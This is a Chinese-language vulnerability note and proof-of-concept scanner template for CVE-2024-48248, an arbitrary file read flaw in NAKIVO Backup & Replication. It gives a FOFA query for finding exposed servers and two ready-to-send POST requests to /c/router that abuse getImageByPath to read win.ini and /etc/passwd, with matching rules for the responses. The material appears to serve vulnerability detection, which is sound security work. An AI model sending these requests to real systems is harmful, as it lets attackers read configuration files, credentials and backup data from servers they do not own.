漏洞描述
NAKIVO Backup & Replication 是一款专注于虚拟化、云端及混合环境的备份与灾难恢复的解决方案。攻击者可利用STPreLoadManagement 类中的 getImageByPath方法,绕过路径验证并读取目标服务器上的任意文件(包括敏感配置文件、数据库、备份日志等)
fofa:title="NAKIVO Backup"
CVE-2024-48248: NAKIVO Backup & Replication任意文件读取漏洞
PoC代码[已公开]
id: CVE-2024-48248
info:
name: NAKIVO Backup & Replication任意文件读取漏洞
author: avic123
severity: critical
verified: true
description: |
NAKIVO Backup & Replication 是一款专注于虚拟化、云端及混合环境的备份与灾难恢复的解决方案。攻击者可利用STPreLoadManagement 类中的 getImageByPath方法,绕过路径验证并读取目标服务器上的任意文件(包括敏感配置文件、数据库、备份日志等)
fofa:title="NAKIVO Backup"
reference:
- https://mp.weixin.qq.com/s/JVj6_tzyh1f1VdIlPc6Tpg
created: 2025/02/27
set:
hostname: request.url.host
rules:
r0:
request:
method: POST
path: /c/router
headers:
Content-Type: application/json
body: |
{"action": "STPreLoadManagement", "data": ["C:/windows/win.ini"], "method": "getImageByPath", "sid": "", "tid": "watchTowr", "type": "watchTowr"}
expression: |
response.status == 200 &&
response.body.bcontains(b'"action":"STPreLoadManagement"') &&
!response.body.bcontains(b'"data":null')&&
response.body.bcontains(b'"data":[')
r1:
request:
method: POST
path: /c/router
headers:
Content-Type: application/json
body: |
{"action": "STPreLoadManagement", "data": ["/etc/passwd"], "method": "getImageByPath", "sid": "", "tid": "watchTowr", "type": "watchTowr"}
expression: |
response.status == 200 &&
response.body.bcontains(b'"action":"STPreLoadManagement"') &&
!response.body.bcontains(b'"data":null') &&
response.body.bcontains(b'"data":[')
expression: r0() || r1()